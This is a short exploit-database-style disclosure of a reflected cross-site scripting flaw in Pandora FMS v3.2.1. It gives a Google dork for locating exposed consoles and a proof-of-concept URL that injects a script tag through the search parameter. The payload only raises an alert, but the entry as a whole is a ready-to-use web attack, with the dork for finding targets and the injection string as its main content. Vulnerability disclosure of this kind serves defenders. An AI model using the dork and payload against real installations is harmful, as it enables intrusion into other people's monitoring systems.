# Exploit Title: Pandora FMS v3.2.1 Cross Site Scripting # Google Dork: intitle:"Pandora FMS - the Flexible Monitoring System" intext:"Your IP" # Date: 8-08-2011 # Author: Mehdi Boukazoula # Software Link: http://pandorafms.org/ # Version: v 3.2.1 # Tested on: v =< 3.2.1 # Description : affected parameter : search page : index.php PoC : http://localhost/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E